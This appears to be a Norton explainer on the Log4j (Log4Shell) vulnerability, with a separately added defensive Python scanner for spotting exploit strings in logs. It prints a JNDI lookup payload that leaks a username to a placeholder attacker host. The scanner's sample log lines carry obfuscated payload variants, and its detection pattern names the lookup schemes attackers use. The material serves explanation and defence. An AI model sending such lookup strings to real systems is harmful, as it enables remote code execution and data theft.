Log4j: A more technical look at the bug


A new software vulnerability exists on many of the platforms and services you use in everyday life. The software bug, called Log4j, has gotten a lot of media attention recently, and it’s easy to understand why. It potentially exists in everything from Android phones to the Minecraft gaming platform.

The question on the minds of many consumers: What should I do?

Norton’s best advice is to update your systems and applications. Make sure you’re running the latest versions. That way, you can be sure your programs have the latest patches that fix software bugs.  

Here’s what you need to know about the Log4j software vulnerability, how it could affect you, and what’s being done. 

The new software vulnerability affects a component that is prevalent, but not well known by average users: Log4j. This vulnerability — or bug — has received the nickname Log4shell. 

Apache Log4j is an open-source software library that is used by many Java programs to process and log events, such as errors. Most people have probably heard of Java. This cross-platform software underpins numerous applications used by ordinary people and companies alike. According to Oracle, the stewards of Java technology, more than 13 billion devices run Java (as of 2015).

Do you play Minecraft? You are using Java. Do you own an Android phone? You are using Java. Do you have a smart TV? Chances are it is running Java. Google, LinkedIn, and Amazon use Java. Java is everywhere. And that means this software flaw is almost everywhere as well.

What products are vulnerable?  

The vulnerable versions of Apache Log4j are version 2.0 to 2.15. New patched versions have been released, but it will take considerable time before these have been updated everywhere Log4j is used. Because this vulnerability is still being researched, additional patched versions are likely. 

The list of vulnerable and potentially vulnerable products that use Log4j is long. An overview is maintained by CISA, but many of the largest software vendors and products available have been mentioned as vulnerable to some extent. These include Microsoft, IBM, Amazon, Apache, Akamai, Atlassian, Broadcom, Cisco — and the list goes on.

What can you do as a home user? 

Other than keeping your devices updated as well as possible, there is not a lot one can do. If you run a Java-enabled server of any kind — for example, a Minecraft server — you should make sure that all the latest patches are applied.  

What are the broader risks of the flaw?

Cybercriminals can potentially use the flaw to break into various internet services and steal user data. That information could then be used for further malicious activity like identity theft.

Are internet-connected devices at risk? 

It’s possible that internet-enabled consumer electronics could be at risk. Smart TVs, DVRs, security cameras — if they run a Java-enabled Apache webserver — might be vulnerable and could be taken over by criminals.   

Do Norton products protect against this flaw?

Although this security flaw will not impact consumers as much as enterprises, Norton products will detect instances of the flaw being exploited and malware planted. More on this in the section below.

Log4j: A more technical look at the bug

Here’s a more technical look at the vulnerability, including how the software bug at a company level could have an impact on everyday consumers.

What does the bug do?

The Log4j logging library processes text of various kinds, such as messages in a chatroom, web server logs, and so on. Normally this is mundane and uneventful. However, when it comes across a string of a certain format it goes astray. One thing Log4j does is expand variables. It treats a statement of the form “${something}” as meaning that something is a variable, and it replaces it with another value; for example, the current date.

However, something can be a specially crafted URL, and that can cause Log4j to try to fetch the value to fill in from a remote site. This leaks information: ${jndi:ldap://evilhackers.tld/${env:USERNAME}}. If the URL points to a Java class file — i.e., Java program code — the code is fetched, loaded into memory and run with no checks as to whether the code is legitimate or not. This is known as Remote Code Execution (RCE) and is a very serious security flaw.
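A defender-side illustration, added here and not part of Norton’s article: a small Python scanner that runs over constructed sample log lines and flags the ${jndi:...} lookup strings described above. Because Log4j also evaluates cosmetic lookups such as ${lower:x} and the default-value form ${::-x}, the scanner first collapses those so a disguised lookup reduces to its plain form before matching; the host names and log lines are made up for the example.

```python
import re

# Constructed sample log lines (not from the article). The first two carry
# Log4Shell-style lookup strings as they would appear in a web access log or
# a chat message; the remaining lines are benign.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://evilhackers.tld/a}"',
    '10.0.0.6 - - "GET /login HTTP/1.1" 200 "${${lower:j}ndi:${::-r}mi://x.tld/b}"',
    '10.0.0.7 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    'chat: user said ${date:yyyy-MM-dd} is fine',
]

# Innermost ${...} with no further "${" or "}" inside it.
_INNER = re.compile(r'\$\{([^${}]*)\}')

def _eval_simple_lookup(body: str) -> str:
    """Evaluate the cosmetic lookups Log4j resolves to plain text; leave the
    rest (jndi, env, date, ...) untouched so they can still be inspected."""
    if body.startswith('lower:'):
        return body[6:].lower()
    if body.startswith('upper:'):
        return body[6:].upper()
    if ':-' in body:                      # ${name:-default} evaluates to "default"
        return body.split(':-', 1)[1]
    return '${' + body + '}'

def normalize(text: str, max_rounds: int = 10) -> str:
    """Repeatedly resolve innermost cosmetic lookups so a disguised string such
    as ${${lower:j}ndi:${::-r}mi://...} collapses to ${jndi:rmi://...}."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _eval_simple_lookup(m.group(1)), text)
        if new == text:
            break
        text = new
    return text

# JNDI lookup pointing at a remote provider; schemes seen in the wild.
_JNDI = re.compile(r'\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://', re.IGNORECASE)

def is_log4shell_probe(line: str) -> bool:
    """True when a line contains a remote JNDI lookup after normalization."""
    return _JNDI.search(normalize(line)) is not None

def scan(lines):
    """Return the lines that look like Log4Shell exploitation attempts."""
    return [ln for ln in lines if is_log4shell_probe(ln)]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LINES):
        print('ALERT:', hit)
```

Matching the normalized string is a triage aid, not proof of compromise: a hit shows someone sent the lookup, and whether it succeeded depends on the Log4j version behind that log.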

Log4j is used by many backend tools that underpin some of the most important Internet infrastructure we have today, so an exploit might not happen immediately, but could travel down the application stack until a backend application no one has been thinking about for years suddenly wants to fetch and run malicious code. Additionally, Log4shell can be used to break into various internet services and steal customer data, which could then be used for further malicious activity such as identity theft. Ransomware attacks could affect people’s workplaces.

Attacks can also be automated, and scanning for this bug has already been ongoing for a while and has been used to install malware like coin miners and ransomware. Although servers are the primary concern, client programs are also vulnerable, making this a potential problem for home users. Consumers running vulnerable programs such as Minecraft (which is now patched) could be attacked by connecting to a malicious server (which Microsoft observed). Compromising consumer systems can lead to the theft of login credentials and financial information, and to the installation of malware such as cryptominers.

Internet-enabled consumer electronics might also be at risk. Smart TVs, DVRs, security cameras — if they run a Java-enabled Apache webserver, they might be vulnerable and could be taken over by cybercriminals.